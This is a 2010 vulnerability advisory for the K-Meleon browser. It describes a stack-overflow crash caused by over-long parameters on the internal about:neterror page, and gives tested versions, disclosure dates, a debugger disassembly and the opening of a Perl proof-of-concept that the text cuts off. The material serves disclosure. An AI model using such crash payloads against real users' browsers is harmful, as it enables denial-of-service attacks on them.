|
############################################
K-Meleon for windows about:neterror Stack Overflow DoS
Vendor URL:http://kmeleon.sourceforge.net/
Advisore:http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html
Vendor notified:Yes exploit available: YES
############################################
K-Meleon is an extremely fast, customizable, lightweight web browser
based on the Gecko layout engine developed by Mozilla which is also
used by Firefox. K-Meleon is free, open source software released under
the GNU General Public License and is designed specifically for
Microsoft Windows (Win32) operating systems.
K-Meleon is prone vulnerable to crashing with a very long URL...
Internal web pages like about:neterror does not limit the amount of
chars that a user put in 'c' 'd' params and them if we compose a
malformed url the browser can be chash easy.This issue is exploitable
via web links like click here or via
window.location.replace('very long url') or similar vectors.
#################
Versions Tested
#################
I have tested this issue in win xp sp3 and a windows 7 fully pached.
Win XP sp3:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes )
K-Meleon 1.6.0a4 Vulnerables.(crashes)
windows 7 Ultimate:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes)
K-Meleon 1.6.0a4 Vulnerables.(crashes)
############
References
############
Discovered: 29-07-2010
vendor notify:31-07-2010
Vendor Response:
Vendor patch:
########################
ASM code stack overflow
########################
ScreenShot => http://2.bp.blogspot.com/_oOk20qcOiUk/TFmDVYmRvHI/AAAAAAAAADM/GMymL2zrnRc/s1600/k-meleon.png
CPU Disasm
Address =A0 Hex dump =A0 =A0 =A0 =A0 =A0Command
0043CB3F =A0 =A0 =A0CC =A0 =A0 =A0 =A0 =A0 =A0INT3
0043CB40 =A0/$ =A03D 00100000 =A0 CMP EAX,1000
0043CB45 =A0|. =A073 0E =A0 =A0 =A0 =A0 JNB SHORT 0043CB55
0043CB47 =A0|. =A0F7D8 =A0 =A0 =A0 =A0 =A0NEG EAX
0043CB49 =A0|. =A003C4 =A0 =A0 =A0 =A0 =A0ADD EAX,ESP
0043CB4B =A0|. =A083C0 04 =A0 =A0 =A0 ADD EAX,4
0043CB4E =A0|. =A08500 =A0 =A0 =A0 =A0 =A0TEST DWORD PTR DS:[EAX],EAX
0043CB50 =A0|. =A094 =A0 =A0 =A0 =A0 =A0 =A0XCHG EAX,ESP
0043CB51 =A0|. =A08B00 =A0 =A0 =A0 =A0 =A0MOV EAX,DWORD PTR DS:[EAX]
0043CB53 =A0|. =A050 =A0 =A0 =A0 =A0 =A0 =A0PUSH EAX
0043CB54 =A0|. =A0C3 =A0 =A0 =A0 =A0 =A0 =A0RETN
0043CB55 =A0|> =A051 =A0 =A0 =A0 =A0 =A0 =A0PUSH ECX
0043CB56 =A0|. =A08D4C24 08 =A0 =A0 LEA ECX,[ARG.1]
0043CB5A =A0|> =A081E9 00100000 /SUB ECX,1000
0043CB60 =A0|. =A02D 00100000 =A0 |SUB EAX,1000
0043CB65 =A0|. =A08501 =A0 =A0 =A0 =A0 =A0|TEST DWORD PTR DS:[ECX],EAX <== Stack overflow
0043CB67 =A0|. =A03D 00100000 =A0 |CMP EAX,1000
0043CB6C =A0|.^ 73 EC =A0 =A0 =A0 =A0 \JNB SHORT 0043CB5A
0043CB6E =A0|. =A02BC8 =A0 =A0 =A0 =A0 =A0SUB ECX,EAX
0043CB70 =A0|. =A08BC4 =A0 =A0 =A0 =A0 =A0MOV EAX,ESP
0043CB72 =A0|. =A08501 =A0 =A0 =A0 =A0 =A0TEST DWORD PTR DS:[ECX],EAX
0043CB74 =A0|. =A08BE1 =A0 =A0 =A0 =A0 =A0MOV ESP,ECX
0043CB76 =A0|. =A08B08 =A0 =A0 =A0 =A0 =A0MOV ECX,DWORD PTR DS:[EAX]
0043CB78 =A0|. =A08B40 04 =A0 =A0 =A0 MOV EAX,DWORD PTR DS:[EAX+4]
0043CB7B =A0|. =A050 =A0 =A0 =A0 =A0 =A0 =A0PUSH EAX
0043CB7C =A0\. =A0C3 =A0 =A0 =A0 =A0 =A0 =A0RETN
0043CB7D =A0 =A0 =A0CC =A0 =A0 =A0 =A0 =A0 =A0INT3
0043CB7E =A0 =A0 =A0CC =A0 =A0 =A0 =A0 =A0 =A0INT3
################
#Proof Of Concept
################
#######################################################################
#!/usr/bin/perl
# k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
# generate the file open it with k-keleon click in the link and wait a seconds
######################################################################
$archivo = $ARGV[0];
if(!defined($archivo))
{
print "Usage: $0